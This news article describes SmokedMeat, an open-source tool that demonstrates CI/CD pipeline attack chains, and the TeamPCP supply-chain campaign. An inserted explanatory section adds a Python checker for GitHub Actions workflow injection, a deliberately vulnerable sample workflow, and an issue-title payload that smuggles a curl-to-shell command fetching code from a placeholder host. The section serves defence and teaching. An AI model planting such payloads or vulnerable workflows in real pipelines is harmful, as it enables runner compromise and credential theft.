Boost Security has released SmokedMeat, an open-source framework that runs attack chains against CI/CD infrastructure so engineering and security teams can see what an attacker would do in their specific environment.

What the tool does
SmokedMeat takes a flagged pipeline vulnerability and executes a live demonstration against a team’s own infrastructure. Starting from a single vulnerability, it deploys a payload, compromises the runner, harvests credentials from process memory, exchanges those credentials for cloud access, exposes private repositories, and maps the blast radius of the attack.
Zaid Al Hamami, CEO of Boost Security, described the scope: “This tool is showing what attackers can do; they can find a vulnerability in an open source repo, craft an exploit payload, steal credentials in that repo, and use those credentials to pivot to other areas, insert malware, infect developers working on those repos.”
The TeamPCP attack that changed the conversation
In March 2026, a coordinated campaign known as TeamPCP compromised Trivy, Checkmarx, LiteLLM, and dozens of npm packages. The attack used techniques that Boost Labs had documented in prior research. Boost’s open-source scanner, Poutine, had flagged vulnerabilities in Trivy’s pipeline months before the attack. Those findings went unpatched. Al Hamami described the campaign as the largest cascade supply chain attack to date.
The backlog problem
Boost Labs had been publishing research on CI/CD attack techniques for years, documenting how attackers move through build pipelines, steal credentials, and pivot into cloud environments. A static scan result that flags “workflow injection possible” does not convey what an attacker can do with that injection in a matter of seconds. Without a concrete demonstration, remediation work tends to stay deprioritized.
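To make the "workflow injection possible" flag concrete, here is an added example in Python (not SmokedMeat or Poutine code, and not from the article): a minimal check for the pattern such a finding usually refers to, where an attacker-controlled event field such as an issue title is interpolated with `${{ }}` directly into a `run:` shell step. The workflow format (GitHub Actions), the list of untrusted contexts (taken from GitHub's own security-hardening guidance) and the two sample workflows are assumptions made for this illustration.

```python
import re

# Assumed for this example: GitHub Actions workflow syntax. The contexts below are
# the ones GitHub's security-hardening guidance lists as attacker-controllable
# (issue/PR text, comments, branch names, commit messages); matched as prefixes.
UNTRUSTED_CONTEXTS = (
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.pull_request.head.ref",
    "github.event.pull_request.head.label",
    "github.event.comment.body",
    "github.event.review.body",
    "github.event.review_comment.body",
    "github.event.head_commit.message",
    "github.event.commits",
    "github.event.pages",
    "github.head_ref",
)

EXPR_RE = re.compile(r"\$\{\{\s*(.+?)\s*\}\}")                       # ${{ expression }}
RUN_RE = re.compile(r"^(\s*)(?:-\s+)?run:\s*([|>][-+]?)?\s*(.*)$")  # run: | or run: cmd


def is_untrusted(expr):
    """True if the expression reads a context an outside contributor controls."""
    expr = expr.strip()
    return any(expr == c or expr.startswith(c + ".") or expr.startswith(c + "[")
               for c in UNTRUSTED_CONTEXTS)


def find_workflow_injections(workflow_text):
    """Return (line_number, expression) for every untrusted ${{ }} inside a run: step.

    Expressions are expanded by the runner *before* the shell sees the script, so an
    untrusted value inside run: is shell injection, not just string formatting.
    """
    findings = []
    block_indent = None   # indent of the run: key whose literal block we are inside
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        m = RUN_RE.match(line)
        if m:
            key_indent, style, inline = m.groups()
            # A block scalar (| or >) continues on the more-indented lines that follow.
            block_indent = len(key_indent) if style else None
            text = inline
        elif block_indent is not None:
            indent = len(line) - len(line.lstrip())
            if line.strip() and indent <= block_indent:
                block_indent = None       # dedent: the run: block has ended
                continue
            text = line
        else:
            continue                      # env:, with:, name: ... are not shell text
        for em in EXPR_RE.finditer(text):
            if is_untrusted(em.group(1)):
                findings.append((lineno, em.group(1).strip()))
    return findings


# Constructed sample: the issue title is spliced straight into the shell script.
VULNERABLE_WORKFLOW = """\
name: triage
on:
  issues:
    types: [opened]
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "New issue: ${{ github.event.issue.title }}"
          echo "Repo: ${{ github.repository }}"
"""

# Constructed hardened version: the untrusted value goes through an env var, so the
# shell receives it as data ($ISSUE_TITLE) rather than as part of the script text.
HARDENED_WORKFLOW = """\
name: triage
on:
  issues:
    types: [opened]
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - env:
          ISSUE_TITLE: ${{ github.event.issue.title }}
        run: |
          echo "New issue: $ISSUE_TITLE"
          echo "Repo: ${{ github.repository }}"
"""


if __name__ == "__main__":
    for label, wf in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(label, find_workflow_injections(wf))
```

In the vulnerable workflow an issue titled `"; curl https://example.invalid/x | sh; echo "` becomes part of the script before bash runs it, with the runner's token and whatever secrets the job exposes available to it; the hardened form passes the same value as an environment variable, which the shell never re-parses. `${{ github.repository }}` is left alone because it is not attacker-controlled. The check only covers `run:` steps; inputs to actions that evaluate code (for example a `script:` passed to a JavaScript-executing action) have the same problem and would need the same treatment.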
SmokedMeat is designed to close that gap by running the attack scenario against real infrastructure, giving security teams and engineering leaders a concrete view of what exploitation looks like in their own environment.
SmokedMeat is available for free on GitHub.


from Help Net Security https://ift.tt/GIrLqwg